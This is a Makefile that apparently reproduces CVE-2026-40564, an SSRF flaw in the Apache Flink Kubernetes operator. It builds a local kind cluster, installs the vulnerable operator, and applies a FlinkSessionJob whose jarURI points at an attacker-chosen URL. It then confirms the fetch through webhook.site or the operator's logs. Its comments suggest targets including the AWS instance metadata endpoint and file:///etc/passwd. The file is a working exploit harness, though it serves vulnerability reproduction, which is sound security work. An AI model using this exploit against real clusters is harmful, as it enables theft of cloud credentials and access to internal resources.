SHELL := /usr/bin/env bash
.SHELLFLAGS := -eu -o pipefail -c

KIND_CLUSTER_NAME ?= cve-2026-40564
OPERATOR_VERSION  ?= 1.14.0
NAMESPACE         ?= default
# Generous default so a slow ghcr.io image pull does not fail the install.
HELM_TIMEOUT      ?= 10m
HELM_REPO_URL     := https://downloads.apache.org/flink/flink-kubernetes-operator-$(OPERATOR_VERSION)/

# SSRF_URL is the full jarURI the operator is coerced into fetching, used verbatim.
# Leave it empty and a fresh webhook.site URL is allocated for you.
# Examples:
#   make verify SSRF_URL=https://webhook.site/<uuid>/exploit.jar   # reuse a webhook.site URL
#   make verify SSRF_URL=https://my.interactsh.example/x.jar       # Burp/interactsh collaborator
#   make verify SSRF_URL=http://169.254.169.254/latest/meta-data/  # AWS IMDS (real impact)
#   make verify SSRF_URL=file:///etc/passwd                        # non-HTTP scheme
# WEBHOOK_URL is accepted as an alias for SSRF_URL.
# verify-ssrf auto-detects the target: webhook.site URLs are confirmed via its API;
# any other target is confirmed from the operator's own logs.
SSRF_URL    ?=
WEBHOOK_URL ?=
TARGET_URL  := $(or $(SSRF_URL),$(WEBHOOK_URL))

.PHONY: help verify cluster-up install-operator session-cluster trigger-ssrf verify-ssrf cleanup

help:
	@printf 'CVE-2026-40564 Reproducer\n\n'
	@printf 'Quick start:  make verify\n\n'
	@printf 'Targets:\n'
	@printf '  verify              Full end-to-end (default)\n'
	@printf '  cluster-up          Create kind cluster + patch CoreDNS\n'
	@printf '  install-operator    Helm-install operator + patch its dnsConfig\n'
	@printf '  session-cluster     Apply the Flink session cluster, wait for JM READY\n'
	@printf '  trigger-ssrf        Allocate a webhook.site URL and apply the malicious CR\n'
	@printf '  verify-ssrf         Poll webhook.site and print captured requests\n'
	@printf '  cleanup             Delete the kind cluster\n\n'
	@printf 'Variables:\n'
	@printf '  SSRF_URL=...        Full jarURI to coerce the operator into fetching\n'
	@printf '                      (any URL/scheme; default: auto-allocated webhook.site)\n'
	@printf '  KIND_CLUSTER_NAME   Cluster name (default: %s)\n' $(KIND_CLUSTER_NAME)
	@printf '  OPERATOR_VERSION    Operator chart/image version (default: %s)\n' $(OPERATOR_VERSION)

verify: cluster-up install-operator session-cluster trigger-ssrf verify-ssrf

# ---------- 1/5 ----------
cluster-up:
	@echo "==> [1/5] cluster-up"
	@if ! kind get clusters | grep -q "^$(KIND_CLUSTER_NAME)$$"; then \
	  kind create cluster --name $(KIND_CLUSTER_NAME); \
	else \
	  echo "kind cluster '$(KIND_CLUSTER_NAME)' already exists"; \
	fi
	@kubectl cluster-info --context kind-$(KIND_CLUSTER_NAME) >/dev/null
	@# kind on Linux + systemd-resolved makes CoreDNS forward to 127.0.0.1, so fix it.
	@if kubectl -n kube-system get configmap coredns -o yaml | grep -q "forward \. /etc/resolv.conf"; then \
	  echo "    patching CoreDNS to forward to 1.1.1.1 / 8.8.8.8..."; \
	  kubectl -n kube-system get configmap coredns -o yaml \
	    | sed 's|forward \. /etc/resolv.conf|forward . 1.1.1.1 8.8.8.8|' \
	    | kubectl apply -f - >/dev/null; \
	  kubectl -n kube-system rollout restart deployment coredns >/dev/null; \
	  kubectl -n kube-system rollout status deployment coredns --timeout=120s >/dev/null; \
	fi

# ---------- 2/5 ----------
install-operator:
	@echo "==> [2/5] install-operator"
	@helm repo add flink-operator $(HELM_REPO_URL) >/dev/null 2>&1 || true
	@helm repo update flink-operator >/dev/null
	@helm upgrade --install flink-kubernetes-operator flink-operator/flink-kubernetes-operator \
	  --version $(OPERATOR_VERSION) \
	  --namespace $(NAMESPACE) \
	  --set webhook.create=false \
	  --wait --timeout $(HELM_TIMEOUT) >/dev/null
	@# Strip the host's DNS search domains from the operator pod.
	@kubectl -n $(NAMESPACE) patch deployment flink-kubernetes-operator --type=strategic -p \
	  '{"spec":{"template":{"spec":{"dnsPolicy":"None","dnsConfig":{"nameservers":["10.96.0.10"],"searches":["$(NAMESPACE).svc.cluster.local","svc.cluster.local","cluster.local"],"options":[{"name":"ndots","value":"5"}]}}}}}' >/dev/null
	@kubectl -n $(NAMESPACE) rollout status deployment/flink-kubernetes-operator --timeout=120s

# ---------- 3/5 ----------
session-cluster:
	@echo "==> [3/5] session-cluster"
	@kubectl -n $(NAMESPACE) apply -f manifests/session-cluster.yaml >/dev/null
	@echo "    waiting for JM READY (first run pulls flink:1.17, can take ~5 min)..."
	@kubectl -n $(NAMESPACE) wait --for=jsonpath='{.status.jobManagerDeploymentStatus}'=READY \
	  flinkdeployment/session-cluster --timeout=10m

# ---------- 4/5 ----------
trigger-ssrf:
	@echo "==> [4/5] trigger-ssrf"
	@if [ -n "$(TARGET_URL)" ]; then \
	  URL="$(TARGET_URL)"; \
	  echo "    using configured target"; \
	else \
	  echo "    allocating a fresh webhook.site token..."; \
	  TOKEN=$$(curl -sf -X POST -H "Accept: application/json" "https://webhook.site/token" 2>/dev/null | jq -r '.uuid' 2>/dev/null || true); \
	  if [ -z "$$TOKEN" ] || [ "$$TOKEN" = "null" ]; then \
	    echo "FAIL: could not allocate a webhook.site token (no network, or jq missing)."; \
	    echo "Provide a target explicitly:  make trigger-ssrf SSRF_URL=https://webhook.site/<uuid>/exploit.jar"; \
	    exit 1; \
	  fi; \
	  URL="https://webhook.site/$$TOKEN/exploit.jar"; \
	fi; \
	echo; \
	echo "    SSRF target : $$URL"; \
	UUID=$$(printf '%s' "$$URL" | grep -oE 'webhook\.site/[a-f0-9-]{36}' | cut -d/ -f2 || true); \
	if [ -n "$$UUID" ]; then echo "    Dashboard   : https://webhook.site/#!/view/$$UUID"; fi; \
	echo; \
	sed "s|jarURI: .*|jarURI: $$URL|" manifests/vulnerable-sessionjob.yaml \
	  | kubectl -n $(NAMESPACE) apply -f - >/dev/null
	@echo "    FlinkSessionJob applied."

# ---------- 5/5 ----------
verify-ssrf:
	@echo "==> [5/5] verify-ssrf"
	@JARURI=$$(kubectl -n $(NAMESPACE) get flinksessionjob cve-2026-40564-ssrf-demo -o jsonpath='{.spec.job.jarURI}' 2>/dev/null); \
	if [ -z "$$JARURI" ]; then \
	  echo "FAIL: no cve-2026-40564-ssrf-demo FlinkSessionJob found in namespace $(NAMESPACE)."; \
	  echo "Run 'make trigger-ssrf' first."; \
	  exit 1; \
	fi; \
	echo "    target jarURI: $$JARURI"; \
	UUID=$$(printf '%s' "$$JARURI" | grep -oE 'webhook\.site/[a-f0-9-]{36}' | cut -d/ -f2 || true); \
	if [ -n "$$UUID" ]; then \
	  echo "    target is webhook.site, confirming via its REST API..."; \
	  curl -sf -X DELETE "https://webhook.site/token/$$UUID/request" >/dev/null 2>&1 || true; \
	  for i in $$(seq 1 90); do \
	    RESP=$$(curl -sf --max-time 5 "https://webhook.site/token/$$UUID/requests?sorting=newest" 2>/dev/null || true); \
	    if [ -n "$$RESP" ] && printf '%s' "$$RESP" | grep -q '"method"'; then \
	      echo; echo "    === webhook.site captured requests (newest first) ==="; \
	      if command -v jq >/dev/null 2>&1; then \
	        printf '%s' "$$RESP" | jq -r '.data[:5][] | "      \(.created_at)  \(.method) \(.url)\n        User-Agent: \(.user_agent)\n        Source IP:  \(.ip)"'; \
	      else \
	        echo "    (install jq for pretty output; raw JSON below)"; printf '%s\n' "$$RESP" | head -c 1500; echo; \
	      fi; \
	      echo; echo "    CVE-2026-40564 CONFIRMED: the operator pod issued an HTTP GET against the attacker URL."; \
	      echo "    Dashboard: https://webhook.site/#!/view/$$UUID"; \
	      exit 0; \
	    fi; \
	    sleep 2; \
	  done; \
	  echo "FAIL: no requests captured within the timeout."; \
	else \
	  echo "    custom target, confirming from the operator's own logs..."; \
	  for i in $$(seq 1 90); do \
	    if kubectl -n $(NAMESPACE) logs deployment/flink-kubernetes-operator 2>/dev/null | grep -q "HttpArtifactFetcher"; then \
	      echo; echo "    === operator stack frames (proof the fetch ran) ==="; \
	      kubectl -n $(NAMESPACE) logs deployment/flink-kubernetes-operator \
	        | grep -E "HttpArtifactFetcher|ArtifactManager\.fetch|uploadJar|submitJobToSessionCluster" | head -10 || true; \
	      echo; echo "    CVE-2026-40564 CONFIRMED: the operator entered HttpArtifactFetcher.fetch with the attacker-supplied jarURI."; \
	      echo "    (Whether the connection completed depends on the target; the SSRF is the operator issuing the request.)"; \
	      exit 0; \
	    fi; \
	    sleep 2; \
	  done; \
	  echo "FAIL: no HttpArtifactFetcher activity in the operator logs within the timeout."; \
	fi; \
	echo "FlinkSessionJob status.error:"; \
	kubectl -n $(NAMESPACE) get flinksessionjob cve-2026-40564-ssrf-demo -o jsonpath='{.status.error}{"\n"}' || true; \
	exit 1

cleanup:
	@kind delete cluster --name $(KIND_CLUSTER_NAME)
